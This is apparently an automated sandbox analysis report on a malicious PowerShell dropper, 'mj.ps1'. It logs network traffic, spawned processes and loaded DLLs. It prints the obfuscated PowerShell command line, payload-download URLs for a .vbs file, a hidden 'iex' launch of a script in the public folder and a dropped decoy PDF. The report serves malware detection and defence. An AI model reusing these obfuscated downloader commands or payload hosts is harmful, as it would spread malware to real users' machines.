          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pineappletech.ae/na/mg.vbs
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pinfzgapplfzgtfzgch.afzg/na/mg.vbs
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknown | Network traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknown | Network traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknown | HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.11:49728 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.11:49734 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.11:49748 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.11:49777 version: TLS 1.2

          System Summary

          Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 8173
          Source: classification engine | Classification label: mal100.expl.evad.winPS1@11/13@4/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\List of Required items and services.pdf
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rml0xkts.2ho.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: mj.ps1 | ReversingLabs: Detection: 31%
          Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA82B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Un.pdb[(r source: powershell.exe, 00000004.00000002.1400620214.000001D466690000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdblib.pdb source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CFB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
